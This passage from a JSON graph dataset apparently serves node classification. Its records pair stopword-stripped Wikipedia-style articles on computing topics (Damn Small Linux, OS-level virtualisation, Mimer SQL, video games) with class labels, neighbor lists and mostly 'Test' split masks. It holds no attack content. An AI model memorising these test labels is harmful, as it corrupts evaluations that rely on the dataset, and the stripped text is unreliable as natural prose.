      10596,
      2407,
      10087,
      370,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      4506,
      11675,
      11676,
      414,
      2462,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      4563,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 6435,
    "label": 7,
    "text": "Comparison_of_video_hosting_services:comparison video hosting services following tables compare general technical information number current notable video hosting services please see individual products articles information basic general information hosts creator/company license/price etc",
    "neighbors": [
      10368,
      8833,
      4194,
      6565,
      235,
      11097,
      10522,
      4219,
      10270,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 6436,
    "label": 2,
    "text": "Damn_Small_Linux:damn small linux damn small linux commonly abbreviated dsl computer operating system x86 family personal computers free open source software terms gnu gpl free open source licenses designed run graphical applications older pc hardware—for example machines 486/early pentium processors little memory dsl live cd size 50 mb originally started experiment see much software could fit 50 mb eventually became full-fledged linux distribution installed storage media small capacities like bootable business cards usb flash drives various memory cards zip drives dsl originally conceived maintained john andrews five years community included robert shingledecker created mydsl system dsl control panel features issues main developers robert according exiled project currently continues work tiny core linux created april 2008 dsl originally based model-k 22 mb stripped version knoppix soon based knoppix proper allowing much easier remastering improvements dsl supports x86 pcs minimum system requirements 486 processor 8 mb ram dsl demonstrated browsing web dillo running simple games playing music systems 486 processor 16 mb ram system requirements higher running mozilla firefox optional add-ons openoffice.org office suite version 4.4.10 dsl released november 18 2008 current includes following software dsl built-in scripts download install advanced packaging tool apt apt enabled user install packages debian repositories additionally dsl hosts software ranging large applications like openoffice.org gcc smaller ones amsn means mydsl system allows convenient one-click download installation software files hosted mydsl called extensions june 2008 mydsl servers hosting 900 applications plugins extensions boot options also called cheat codes dsl automatic hardware detection may fail user may want use something default settings language keyboard vga fail safe graphics text mode ... dsl allows user enter one cheat codes boot prompt nothing entered dsl boot default options cheat codes affect many auto-detection hardware options many cheat codes also affect gui list cheat codes seen boot time also dsl wiki also run partydisk dsl mydsl handled maintained mostly robert shingledecker hosted many organizations ibiblio belgium belnet 2 areas mydsl regular testing regular area contains extensions proven stable enough everyday use broken different areas apps net system uci universal compressed iso extensions .uci format mounted separate filesystem minimize ram usage testing area newly submitted extensions theoretically work 'as advertised may number bugs standard flavour dsl live cd also versions available one also boot dsl using boot-floppy created one available floppy images 'bootfloppy.img 'bootfloppy-grub.img 'bootfloppy-usb.img 'pcmciabootfloppy.img old computers bios support el torito bootable cd specification dsl kernel loaded floppy disk ram kernel runs dsl cd usb drive dsl ported xbox video game console x-dsl x-dsl requires modified xbox run live cd installed xbox hard drive users also run x-dsl usb flash drive using usb adaptor included phantasy star online plugs memory card slot includes one usb 1.1 port x-dsl boots x11-based gui xbox controller used control mouse pointer enter text using virtual keyboard x-dsl fluxbox desktop programs e-mail web browsing word processing playing music x-dsl customized downloading extensions mydsl servers dsl live usb damn small linux created manually application like unetbootin see list tools create live usb systems full list due infighting among project originators main developers dsl development seemed standstill long time future project uncertain much dismay many users july 8 2012 john andrews original developer announced new release developed dsl website including forums inaccessible back well first rc new 4.11 released august 3 2012 followed second one september 26 damnsmalllinux.org site inaccessible sometime 2015 february 2016 march 27 2016 damnsmalllinux.org accessible time february 10 2019 inaccessible yet may 21 2019 accessible linux distributions derived damn small linux",
    "neighbors": [
      3101,
      4637,
      9762,
      9253,
      11305,
      56,
      8248,
      59,
      4673,
      5190,
      2125,
      9807,
      1618,
      1110,
      89,
      4186,
      3685,
      10341,
      10860,
      2671,
      10352,
      11388,
      1150,
      8837,
      10394,
      7840,
      673,
      3745,
      7854,
      2738,
      4790,
      7364,
      8907,
      6371,
      4841,
      6890,
      7913,
      7914,
      7920,
      8432,
      5363,
      9461,
      6393,
      8957,
      7431,
      7435,
      2321,
      5397,
      4887,
      6935,
      10530,
      7983,
      11568,
      823,
      7483,
      3903,
      2375,
      2397,
      2914,
      9064,
      7020,
      7534,
      9074,
      6012,
      10127,
      1937,
      10149,
      2996,
      439,
      4039,
      5596,
      9693,
      8676,
      485,
      1515,
      7152,
      8177,
      5110,
      10747
    ],
    "mask": "Test"
  },
  {
    "node_id": 6437,
    "label": 9,
    "text": "Ciao_(programming_language):ciao programming language ciao general-purpose programming language supports logic constraint functional higher-order object-oriented programming styles main design objectives high expressive power extensibility safety reliability efficient execution ciao provides full prolog system supporting iso-prolog declarative subsets extensions prolog functional programming including lazy evaluation higher-order predicate abstractions constraint programming objects well feature terms records persistence several control rules breadth-first search iterative deepening ... concurrency threads/engines distributed execution agents parallel execution libraries also support www programming sockets external interfaces c java tcltk relational databases etc etc ciao built kernel extensible modular design allows restricting extending language — seen language building language restrictions extensions activated separately program module several extensions coexist application different modules programming large ciao supported via ciao also support programming small compiler capable producing small executables including builtins used program interpreter supports scripting environment includes classical top-level evolved emacs interface embeddable source-level debugger number execution visualization tools ciao preprocessor supports static debugging verification assertion checking optimization via source source program transformation tasks performed ciaopp distributed separately ciao includes lpdoc automatic documentation generator processes programs adorned ciao assertions machine-readable comments generates manuals many formats including html pdf texinfo info man etc. well on-line help ascii readme files entries indices manuals info www ... maintains www distribution sites ciao compiler run outside top level shell generates several forms architecture-independent stand-alone executables run speed efficiency executable size competitive high-level languages general particular commercial academic prolog/clp systems modules compiled compact bytecode c source files linked statically dynamically autoloaded",
    "neighbors": [
      9345,
      8421,
      8262,
      6536,
      5612,
      5677,
      6797,
      7983,
      8973,
      5492,
      5880,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6438,
    "label": 2,
    "text": "OS-level_virtualisation:os-level virtualisation os-level virtualization refers operating system paradigm kernel allows existence multiple isolated user-space instances instances called containers solaris docker zones solaris virtual private servers openvz partitions virtual environments ves virtual kernel dragonfly bsd jails freebsd jail chroot jail may look like real computers point view programs running computer program running ordinary operating system see resources connected devices files folders network shares cpu power quantifiable hardware capabilities computer however programs running inside container see container contents devices assigned container unix-like operating systems feature seen advanced implementation standard chroot mechanism changes apparent root folder current running process children addition isolation mechanisms kernel often provides resource-management features limit impact one container activities containers term container popularly referring os-level virtualization systems sometimes ambiguously used refer fuller virtual machine environments operating varying degrees concert host os e.g microsoft hyper-v containers ordinary operating systems personal computers computer program see even though might able access system resources include operating system may able allow deny access resources based program requests user account context runs operating system may also hide resources computer program enumerates appear enumeration results nevertheless programming point view computer program interacted resources operating system managed act interaction operating-system-virtualization containerization possible run programs within containers parts resources allocated program expecting see whole computer run inside container see allocated resources believes available several containers created operating system subset computer resources allocated container may contain number computer programs programs may run concurrently separately may even interact one another containerization similarities application virtualization latter one computer program placed isolated container isolation applies file system operating-system-level virtualization commonly used virtual hosting environments useful securely allocating finite hardware resources among large number mutually-distrusting users system administrators may also use consolidating server hardware moving services separate hosts containers one server typical scenarios include separating several programs separate containers improved security hardware independence added resource management features improved security provided use chroot mechanism however nowhere near ironclad operating-system-level virtualization implementations capable live migration also used dynamic load balancing containers nodes cluster operating-system-level virtualization usually imposes less overhead full virtualization programs virtual partitions use operating system normal system call interface need subjected emulation run intermediate virtual machine case full virtualization vmware esxi qemu hyper-v paravirtualization xen uml form virtualization also require hardware support efficient performance operating-system-level virtualization flexible virtualization approaches since host guest operating system different host one different guest kernel example linux different distributions fine operating systems windows hosted solaris partially overcomes limitation described branded zones feature provides ability run environment within container emulates older solaris 8 9 version solaris 10 host linux branded zones referred lx branded zones also available x86-based solaris systems providing complete linux userspace support execution linux applications additionally solaris provides utilities needed install red hat enterprise linux 3.x centos 3.x linux distributions inside lx zones however 2010 linux branded zones removed solaris 2014 reintroduced illumos open source solaris fork supporting 32-bit linux kernels implementations provide file-level copy-on-write cow mechanisms commonly standard file system shared partitions partitions change files automatically create copies easier back space-efficient simpler cache block-level copy-on-write schemes common whole-system virtualizers whole-system virtualizers however work non-native file systems create roll back snapshots entire system state",
    "neighbors": [
      5120,
      6150,
      2058,
      3082,
      10776,
      4636,
      5660,
      7733,
      5177,
      5697,
      8772,
      5702,
      8266,
      7248,
      7249,
      9306,
      11363,
      1637,
      9839,
      9844,
      4734,
      9343,
      5247,
      6797,
      4238,
      2212,
      5805,
      7349,
      1718,
      5819,
      2236,
      11459,
      8395,
      7889,
      10455,
      6361,
      10977,
      8439,
      1273,
      5378,
      4368,
      274,
      8466,
      5397,
      10016,
      295,
      10535,
      10537,
      7983,
      9525,
      11573,
      823,
      318,
      850,
      1362,
      7507,
      11097,
      6491,
      2910,
      7521,
      1891,
      7537,
      7027,
      2421,
      2424,
      1927,
      4505,
      1946,
      9625,
      3484,
      11698,
      9655,
      5049,
      4571,
      998,
      1513,
      4073,
      9201,
      3058,
      499
    ],
    "mask": "Test"
  },
  {
    "node_id": 6439,
    "label": 4,
    "text": "FinalCode:finalcode finalcode inc. multi-national software company provides data-centric security information rights management irm help enterprises mitigate data leakage meet compliance requirements finalcode allows users securely collaborate share files using communication channel including existing enterprise content management ecm cloud storage collaboration applications finalcode privately held headquartered san jose california additional offices singapore japan australia united kingdom finalcode inc founded 2014 part international expansion finalcode opened regional headquarters singapore may 2016 september 2016 additional regional headquarter opened london uk cover emea region finalcode also additional offices presence japan australia finalcode provides aes-256 encryption granular permission sets corporate user policy templates file lifecycle activity analytics dynamic policy modification ability remotely delete files shared nowiki finalcode ’ patented cryptoease™ technology adds layer file protection remains persistent whether file circulates internally outside organization offering comprehensive file-based information rights management irm allows organizations file owner retains comprehensive file control auditing capability means recipients usage permissions delete files remotely. /ref official website",
    "neighbors": [
      7899,
      420
    ],
    "mask": "None"
  },
  {
    "node_id": 6440,
    "label": 3,
    "text": "Higemaru_Makaijima_-_Nanatsu_no_Shima_Daibōken:higemaru makaijima nanatsu shima daibōken higemaru makaijima hero pirate ship higemaru named momotaru must pilot sailing vessel around ocean surrounding seven islands goal find greatest treasure must collect keys open dock gates islands invading several pirate ships defeating captain board combat gameplay pirate ships taken directly arcade predecessor small modifications momotaru collected key pirate ship must sail around islands search correct dock gate key corresponds player embarks exploration island find items defeat boss collect treasures heading search another island key island exploration sections extremely reminiscent dungeon exploration aspects legend zelda game often compared",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 6441,
    "label": 2,
    "text": "Fluent_Design_System:fluent design system fluent design system codenamed project neon officially unveiled microsoft fluent design system design language developed 2017 microsoft fluent design revamp microsoft design language 2 includes guidelines designs interactions used within software designed windows 10 devices platforms system based five key components light depth motion material scale new design language includes prominent use motion depth translucency effects transition fluent long-term project preliminary aspects design particularly acrylic translucency effects reveal effects buttons incorporated windows 10 particularly within fall creators update released october 2017 well update xbox one system software released alongside aspects fluent introduced windows time purpose light draw attention illuminate information upon hovering reveal highlight illuminates nearby hidden borders objects hamburger navigation menu lists buttons upon selection clicking tapping white circular illumination effect quickly appears additionally windows holographic environment rounded white pointer exists 6 november 2017 microsoft employee david haz stated plans apply reveal highlight taskbar exist—but occurred focusable items border glow via focus visual addition depth utilizes z-axis allows content differentiation via layering depth presented via drop shadows z-depth layering motion establishes relationship ui elements provides continuity experience list animations inserting removing items collection connected animations item transitions content change element appears continue flying across app used portion content page change fade-in fade-out bring dismiss items view parallax moves objects different rates background moves slower content example list scroll faster background image creating depth effect addition motion item pressed momentarily recedes background restores original position examples press feedback include start menu live tiles action center quick actions microsoft edge address bar buttons acrylic material creates translucent blurred effect slight noise effect visual hierarchy created using different opacities example app primary content surfaces often opaque exception widgets lightweight apps calculator secondary pane 80 background acrylic tertiary pane 60 background acrylic background acrylic blurs items behind active acrylic material in-app acrylic blurs content within app acrylic disabled specific window app longer selected types acrylic disabled system-wide transparency disabled battery saver mode enabled low-end hardware background acrylic disabled window de-selected windows 10 mobile hololens tablet mode apps scale across different form factors display sizes 0d 3d elements adapt screen size available across multiple dimensions conscious controls also categorized within scale e.g scrollbars inputs adapt different methods invocation fluent key principles blocks light depth motion material scale turn away flat concept metro defined preserving clean look feel metro introduced fluent renews visuals aero design approach introduced windows vista windows 7 including blurred translucency parallax animated patterns drop shadow highlight effects following mouse pointer input gesture movements faux materials metro dumped",
    "neighbors": [
      8576,
      641,
      4356,
      11524,
      3463,
      651,
      6797,
      782,
      1935,
      8080,
      3857,
      8976,
      11283,
      2196,
      10388,
      10900,
      4505,
      11546,
      11549,
      7970,
      4515,
      8740,
      11301,
      1832,
      3496,
      3881,
      6697,
      6827,
      1581,
      430,
      3250,
      3890,
      8757,
      9910,
      6972,
      6462,
      7615,
      321,
      4289,
      7106,
      582,
      9033,
      1098,
      10957,
      4051,
      9173,
      11221,
      2391,
      11605,
      4316,
      8798,
      11103,
      5600,
      10338,
      4326,
      2919,
      8296,
      617,
      4074,
      4458,
      5225,
      8299,
      8681,
      5103,
      9448,
      10989,
      7796,
      6265,
      8315,
      636,
      639
    ],
    "mask": "Test"
  },
  {
    "node_id": 6442,
    "label": 2,
    "text": "Special_Real_Time_Operating_System:special real time operating system special real time operating system srtos discontinued ibm real time operating system originally designed use electricity industry later also applied areas industrial process control formed part realtime plant management system rpms advanced control system acs rather standalone operating system designed extension os/vs1 os/vs2 later mvs operating systems also used paper industry srtos originally released 1976 continued used 1980s",
    "neighbors": [
      10883,
      4996,
      6148,
      7053,
      9619,
      9366,
      11673,
      6557,
      3359,
      10273,
      7983,
      9139,
      6325,
      10040,
      573,
      1219,
      964,
      6342,
      8272,
      863,
      3938,
      5603,
      868,
      3429,
      5220,
      9829,
      375,
      2168,
      3323,
      2172,
      2813
    ],
    "mask": "None"
  },
  {
    "node_id": 6443,
    "label": 4,
    "text": "Digital_Forensics_Framework:digital forensics framework digital forensics framework dff computer forensics open-source software used professionals non-experts collect preserve reveal digital evidence without compromising systems data digital forensics framework offers graphical user interface gui developed pyqt classical tree view features recursive view tagging live search bookmarking available command line interface allows user remotely perform digital investigation comes common shell functions completion task management globing keyboard shortcuts dff run batch scripts startup automate repetitive tasks advanced users developers use dff directly python interpreter script investigation addition source code package binary installers gnu/linux windows digital forensics framework available operating system distributions typical free open-source software foss including debian fedora ubuntu digital forensics framework methods available digital forensics oriented distribution live cd published books mention digital forensics framework dff used solve 2010 digital forensic research workshop dfrws challenge consisting reconstructing physical dump nand flash memory",
    "neighbors": [
      5284,
      9319,
      8554,
      6797,
      7983,
      5397,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 6444,
    "label": 7,
    "text": "Alpha7:alpha7 alpha7 cloud technology company headquartered singapore business cloud enabler clients including listed companies enterprises small medium-sized enterprises spanning various industries asia-pacific region founded january 2014 singapore january 2015 alpha7 launched “ cooaas ” chief operating officer service concept intended provide services chief operating officer coo outsourced retainer project basis alpha7 currently works 25 companies whose applications offered cooaas platform may 2015 alpha7 launched imap system recommending right tools business owners help day-to-day operations imap recommends technology tools solutions services based businesses available budget across marketing sales business operations finance human resources business owners receive advice five areas need focus imap targets small medium enterprises fewer 1,000 employees.in month alpha7 received private funding 3.1 million us 2.3 million september 2015 launched a7 appsconnect a7 bizconnect a7 appsconnect offers companies access applications focused key business functions marketing sales operations finance human resources applications offered include sugarcrm vtiger dolibarr drupal quickbooks eventbrite a7 bizconnect advisory tool reviews businesses front back-end business processes recommending business outcomes aimed delivering productivity growth based available budgets alpha7 also provides cloud advisory consultancy services small medium-sized enterprises smes startups",
    "neighbors": [
      6018,
      1539,
      8451,
      6027,
      4236,
      10893,
      526,
      911,
      272,
      1935,
      4623,
      8592,
      405,
      2965,
      2328,
      4377,
      8986,
      10265,
      5662,
      11038,
      5666,
      6307,
      9766,
      39,
      5159,
      2217,
      8495,
      3121,
      5681,
      9906,
      7352,
      10681,
      11070,
      448,
      2496,
      4289,
      8515,
      10820,
      3269,
      11201,
      1224,
      8520,
      4683,
      4429,
      590,
      1102,
      7248,
      1362,
      467,
      5202,
      9682,
      7512,
      10200,
      6618,
      6367,
      4194,
      11646,
      3428,
      5732,
      6632,
      1001,
      10090,
      2795,
      3819,
      7660,
      8044,
      2170,
      5499,
      253,
      8446,
      8191
    ],
    "mask": "None"
  },
  {
    "node_id": 6445,
    "label": 2,
    "text": "Nexenta_OS:nexenta os nexenta os officially known nexenta core platform discontinued computer operating system based opensolaris ubuntu runs ia-32- x86-64-based systems emerged fall 2005 sun microsystems started opensolaris project june year nexenta systems inc. initiated project sponsored development nexenta os version 1.0 released february 2008 late 2011 nexenta os brand terminated replaced illumian derived community development illumos openindiana distinguished use debian packaging illumian version 1.0 released february 2012 following initial release illumian 2012 illumian project discontinued initially two official apt repositories testing unstable totalling 9000 packages third stable added first official release nexenta os available installcd vmware images live cd also available releases alpha 5 nexenta repositories follow general debian structure main contrib non-free stable releases use subset structure packages originate debian gnu/linux nexenta.org website retired early 2012 since nexenta os use linux kernel sun recently began releasing code solaris operating system free open source software supports less diverse hardware debian variants nexenta os team decided focus minimal opensolaris effort called nexenta core platform ncp forms basis nexentastor nas storage solution version 1.0 nexenta core platform released february 10 2008 nexenta core platform first operating system combine opensolaris kernel gnu userland tools aimed bring technologies zfs zones gnu/debian community additional purpose os provide kernel allowing proprietary closed source hardware drivers produced inclusion open source operating system nexentastor proprietary operating system built nexenta systems top nexenta core platform optimized use virtualized server environments including nas iscsi fibre channel applications built around zfs file system features iscsi support unlimited incremental backups 'snapshots snapshot mirroring replication block level mirroring cdp integrated search within zfs snapshots custom api focus zfs carries potential benefits virtualized server farms terms performance thin provisioning operating system currently distributed iso vmware disk images pricing determined per-terabyte per-server licensing basis community edition available free charge users less 18 terabytes raw disk space pre-redundancy volume creation free tier model changed release version 5.0 community edition 10 terabyte limit assigned usable post-redundancy volume creation disk space enterprise version except lack paid plugins commercial support install many free open source plugins developed hosted community edition website community edition though intended hobbyist use production use community edition forbidden nexentastor eula therefore use term community edition remains disputable readydataos firmware embedded network-attached storage nas distribution based nexenta os zfs support nexenta os runs netgear readydata hardware",
    "neighbors": [
      2179,
      2180,
      5369,
      5380,
      6787,
      6153,
      6412,
      8077,
      10257,
      5397,
      3478,
      2967,
      1304,
      5755,
      8476,
      3487,
      5280,
      6049,
      5410,
      10016,
      11506,
      5413,
      3241,
      7983,
      3248,
      8112,
      2995,
      9141,
      823,
      439,
      7863,
      9784,
      7483,
      9151,
      10687,
      3649,
      9665,
      10436,
      3654,
      5962,
      5067,
      1107,
      4951,
      5335,
      9971,
      3550,
      5343,
      4192,
      6369,
      6625,
      6371,
      7140,
      11363,
      7913,
      5356,
      7020,
      366,
      9324,
      8177,
      2930,
      499,
      1396,
      3189,
      5363,
      1399,
      2424,
      633,
      4858,
      5492,
      5240,
      381,
      1150,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 6446,
    "label": 2,
    "text": "Autopackage:autopackage autopackage free computer package management system aimed making simple create package installed linux distributions created mike hearn around 2002 august 2010 listaller autopackage announced projects merge projects amsn inkscape offered autopackage installer freecode offered content submitters field put url autopackages list available packages limited program versions obsolete example recent autopackage gimp 2.2.6 even though gimp version 2.8.2 august 2012 autopackage designed installing binary pre-compiled versions non-core applications word processors web browsers personal computer games rather core libraries applications operating system shells concept autopackage improve linux desktop platform stable binary interfaces comparable windows macos autopackage intended provide installation core applications libraries compatibility reasons using autopackage distribute non-core libraries something thorny issue one hand distributing via autopackage allows installation greater range systems hand conflicts native package dependencies autopackage intended complementary system distribution usual packaging system rpm deb unlike formats autopackage verifies dependencies checking presence deployed files rather querying database installed packages simplifies design requirements autopackage relying available resources rather necessitating tracking package choices targeted distributions programs use autopackage must also relocatable meaning must installable varying directories single binary enables autopackage installed non-root user user home directory autopackage packages indicated .package extension executable bash scripts installed running files autopackage archive easily extracted anything autopackage internal format must parsed order determine file layout issues autopackage programs installed hard-coded system paths may conflict existing packages installed means thus leading corruption usually remedied uninstalling older version package installed autopackage autopackage files also installed removed using listaller toolset listaller simply includes autopackage packages package container format handles autopackage like listaller package file",
    "neighbors": [
      11525,
      2310,
      10760,
      2955,
      7435,
      7181,
      7947,
      9487,
      2448,
      788,
      1813,
      8213,
      10900,
      6680,
      8476,
      5670,
      4775,
      7847,
      6828,
      7983,
      1842,
      823,
      2872,
      6583,
      3131,
      5819,
      10172,
      190,
      3649,
      10817,
      9671,
      5067,
      3918,
      463,
      3667,
      6227,
      2901,
      7293,
      4951,
      6361,
      2010,
      9564,
      2401,
      1379,
      7140,
      741,
      231,
      5096,
      6119,
      8554,
      9063,
      9324,
      7920,
      6257,
      1138,
      1522,
      2804,
      10096,
      6393,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 6447,
    "label": 3,
    "text": "Compaq_Presario_R3000:compaq presario r3000 compaq presario r3000 line series laptops designed built hewlett-packard corporation could shipped microsoft windows 98 2000 xp series used intel amd processors could 256 mb 256 mib 512 mb ram reserved graphics card ati mobility radeon 9000/9100 igp integrated graphics processor board sound card made analog devices also board connected jbl pro speakers ports computer usb ieee 1394 firewire headphone microphone s-video monitor parallel also rj45 connector network cable phone line jack one special series expansion port hp expansion dock type port found hp notebooks models series broadcom wifi adapters computer disk reader writer capable playing dvds burning cds downloading software disk computer encased black silver plastic shell weighs ten pounds two cooling fans mounted keyboard",
    "neighbors": [
      5384,
      6765,
      6797
    ],
    "mask": "Test"
  },
  {
    "node_id": 6448,
    "label": 2,
    "text": "4K_Disk_Monitor_System:4k disk monitor system pdp-8 disk monitor discontinued operating system released digital equipment corporation pdp-8 line mini-computers minimum hardware requirements consisted teleprinter 3 cycle data break option pdp-8/s model mass storage option df32 disk sub-system tc01 dectape unit later releases additional option using rf08 disk drive distribution media paper tape common means data storage computers era included user programs consisted mainly modified versions paper tape software library distributed dec pdp-8 family small computers much exported tss-8 ms/8 operating systems",
    "neighbors": [
      3650,
      7076,
      1253,
      8262,
      2507,
      1804,
      6155,
      8876,
      7983,
      10475,
      273,
      6837,
      8503,
      8732,
      10590,
      9759
    ],
    "mask": "None"
  },
  {
    "node_id": 6449,
    "label": 3,
    "text": "Adventure_Island_(video_game):adventure island video game hudson adventure island side-scrolling platform game produced hudson soft released japan famicom msx september 12 1986 released north america nintendo entertainment system september 1988 pal region 1992 title adventure island classic adventure island adaptation arcade game wonder boy developed escape sega adventure island followed series sequels connection wonder boy series player controls master higgins known master wigins united kingdom takahashi meijin japanese versions young man ventured adventure island south pacific hearing evil witch doctor kidnapped princess tina rescue higgins must survive series 32 stages eight worlds called areas divided four stages rounds divided four checkpoints player reaches fourth round area must confront boss end continue next area game completed player saves girl defeating eighth final form evil lord master higgins player character loses life whenever touches enemy enemy attack fire roast falls pitfall body water moreover player also health gauge starts 11 points gradually depletes time whenever higgins trips rock path higgins health gauge reaches zero lose life well higgins still extra lives left revive last checkpoint passed game ends higgins lives runs replenish health higgins pick numerous fruits milk bottle path maximum health reaches 16 points player score reaches 50,000 points 100,000 points 200,000 points higgins receive extra life finding bee-like fairy known honey girl grant higgins invincibility ten seconds allow kill enemies single touch also hidden somewhere stage special pot doubles player end-of-stage bonus collected higgins starts life without ability attack gain ability attack picking stone axe found specific spots stage higgins wielding stone axe trade magical fireballs longer range capable destroying rocks rolling stones invulnerable stone axe break egg player must touch hit weapon twice addition weapons numerous bonus items stuck inside also negative item eggplant drains higgins life meter eggs immediately visible plain sight locations hidden eggs usually indicated weapon thrown player disappears falling ground uncovered jumping indicated spot hidden spots n't contain hidden eggs instead cloud warp player bonus stage instead uncovered standing still short period time bonus stages player collect series fruits worth 500 points regardless type higgins falls pitfall however instead losing life return regular stage next checkpoint fourth round area higgins confront different form evil witch doctor game boss character ability change head eight different types higgins must defeat striking head specific number times weapon number hits required defeat increases area first form requires eight hits every subsequent form requires two additional hits eighth final form requires 22 hits evil witch doctor defeated change head escape next area uses attack form thing changes besides durability mobility speed speed fireball attacks higgins defeats final form evil witch doctor fall pit girl rescued adventure island began development direct port sega arcade game wonder boy rights hudson soft obtained developer escape known westone bit entertainment development port decision made change character design protagonist modeling naming hudson soft spokesman takahashi meijin western version adventure island takahashi meijin character renamed master higgins wonder boy series adopted action rpg system sequels beginning wonder boy monster land adventure island sequels stuck game system original wonder boy moreover hudson soft also obtained rights port wonder boy sequels turbografx-16 changing title character designs game exception incidentally japanese version dragon curse turbografx-16 adaptation titled adventure island rights adventure island series currently owned konami absorbed hudson soft 2012 nes version adventure island re-released japan game boy advance famicom mini title may 21 2004 later re-released internationally virtual console service 2008 wii 2014 wii u remake also developed playstation 2 gamecube titled hudson selection volume 4 takahashi meijin bōken jima released exclusively japan december 18 2003 two sequels produced nes adventure island ii adventure island 3 well fourth game famicom released exclusively japan titled takahashi meijin bōken jima iv addition standalone famicom mini re-release first game four games re-released compilation game boy advance titled hudson best collection vol 6 bōken jima collection released japan january 19 2006 sequels also released platforms adventure island adventure island ii game boy based second third nes games respectively super adventure island super adventure island ii super nes new adventure island turbografx-16 wii gacha wa shi meijin bōken jima 2007 mobile adventure island quest takahashi meijin 2010 mobile takahashi meijin appears playable character crossover fighting game dreammix tv world fighters released japan gamecube december 13 2003 takahasia meijin also appears sport mobile game gachapin mukku supōtsugēmuapuri 2008 adventure island received positive mixed reviews critics gamespot awarded game 6.5 10 calling fast-paced challenging platformer gamesradar+ ranked 23rd best nes game ever made staff praised fact challenge comes quality level design low quality",
    "neighbors": [
      4357,
      9957,
      10695,
      4524,
      2156,
      9006,
      10316,
      10576,
      8887
    ],
    "mask": "Test"
  },
  {
    "node_id": 6450,
    "label": 9,
    "text": "Simcenter_Amesim:simcenter amesim simcenter amesim commercial simulation software modeling analysis multi-domain systems part systems engineering domain falls mechatronic engineering field software package suite tools used model analyze predict performance mechatronics systems models described using nonlinear time-dependent analytical equations represent system ’ hydraulic pneumatic thermal electric mechanical behavior compared 3d cae modeling approach gives capability simulate behavior systems detailed cad geometry available hence used earlier system design cycle v-model create simulation model system set libraries used contain pre-defined components different physical domains icons system connected purpose icon ports several inputs outputs causality enforced linking inputs one icon outputs another icon vice versa simcenter amesim libraries written c language also support modelica non-proprietary object-oriented equation based language model complex physical systems containing e.g. mechanical electrical electronic hydraulic thermal control electric power process-oriented subcomponents software runs linux windows platforms simcenter amesim part siemens plm software simcenter portfolio combines 1d simulation 3d cae physical testing intelligent reporting data analytics portfolio intended provide engineers analysts comprehensive solution development complex products include smart systems implementing predictive engineering analytics approach simcenter amesim software developed imagine s.a. company acquired june 2007 lms international acquired november 2012 siemens ag imagine s.a. company created 1987 dr michel lebrun university claude bernard france control complex dynamic systems coupling hydraulic servo-actuators finite-elements mechanical structures initial engineering project involved deck elevation sinking ekofisk north sea petroleum platforms early 1990s association pr c. w. richards coming university bath england led first commercial release simcenter amesim 1995 dedicated fluid control systems simcenter amesim used companies automotive aerospace advanced manufacturing industries simcenter amesim multi-domain software allows link different physics domains hydraulic pneumatic mechanic electrical thermal electromechanical based bond graph theory modelling system done four steps submodel parameter mode simcenter amesim model compiled windows platform simcenter amesim works free gcc compiler provided software also works microsoft visual c++ compiler free express edition since version 4.3.0 simcenter amesim uses intel compiler platforms simcenter amesim features create system simulation model simcenter amesim components different physical domains assembled physical libraries developed engineering services partnerships customers version 2019.1 simcenter amesim offered 48 libraries 6500 multi-physics models answer various application requirements simcenter amesim libraries simcenter amesim simcenter sysdm simcenter system architect simcenter webapp server simcenter amesim used engineering schools universities also reference framework various research projects europe free simcenter amesim student edition license downloaded",
    "neighbors": [
      1952,
      9376,
      8554,
      5612,
      1917,
      6797,
      847,
      3567,
      8079,
      2804,
      9780,
      823,
      3960,
      2045,
      7326
    ],
    "mask": "Test"
  },
  {
    "node_id": 6451,
    "label": 1,
    "text": "Mimer_SQL:mimer sql mimer sql sql-based relational database management system produced swedish company mimer information technology ab mimer ab formerly known upright database technology ab originally developed research project uppsala university uppsala sweden 1970s developed commercial product database deployed wide range application situations including nhs pulse blood transfusion service uk volvo cars production line sweden automotive dealers australia sometimes one limited options available realtime critical applications resource restricted situations mobile devices mimer sql originated project itc service center supporting uppsala university institutions leverage relational database capabilities proposed codd others initial release 1975 designated rapid written ibm assembler language name changed mimer 1977 avoid trademark issue universities interested project number machine architectures mimer re-written fortran achieve portability models developed mimer mimer/ql implementing quel query languages emergence sql 1980s standard query language resulted mimers developers choosing adopt product becoming mimer sql 1984 mimer transferred newly established company mimer information systems mimer sql database server currently supported main platforms windows macos linux openvms alpha integrity previous versions database engine supported operating systems including solaris aix hp-ux tru 64 sco versions mimer sql available download free development enterprise product standards based sql database server based upon mimer sql experience database server product highly configurable components added removed replacing foundation product achieve derived product suitable embedded real-time small footprint application mimer sql realtime database server replacement database engine specifically designed applications real-time aspects paramount sometimes marketed automotive approach resource limited environments mimer sql mobile database server replacement runtime environment without sql compiler used portable certain custom devices termed mobile approach custom embedded approaches applied multiple hardware operating system system combinations options enable mimer sql deployed wide variety additional target platforms real-time operating systems including android vxworks database available real-time embedded automotive specialist versions requiring maintenance intention make product suitable mission-critical automotive process automation telecommunication systems mimer sql provides support multiple database application programming interfaces apis odbc jdbc ado.net embedded sql c/c++ cobol fortran native api mimer sql real-time api mimer sql micro c api mimer provider manager ado.net provider dispatcher uses different plugins access different underlying ado.net providers mimer provider manager makes possible write database independent ado.net applications mimer sql mainly uses optimistic concurrency control occ manage concurrent transactions makes database locking free enables real-time predictability mimer sql assigned port 1360 internet assigned numbers authority iana registry name mimer taken norse mythology mimer giant guarding well wisdom also known mímisbrunnr metaphorically database system managing data",
    "neighbors": [
      6797,
      9742,
      10389,
      9366,
      10518,
      1304,
      2972,
      10921,
      10413,
      10286,
      9263,
      823,
      9286,
      6993,
      2901,
      9177,
      1383,
      4598,
      8188
    ],
    "mask": "Test"
  },
  {
    "node_id": 6452,
    "label": 3,
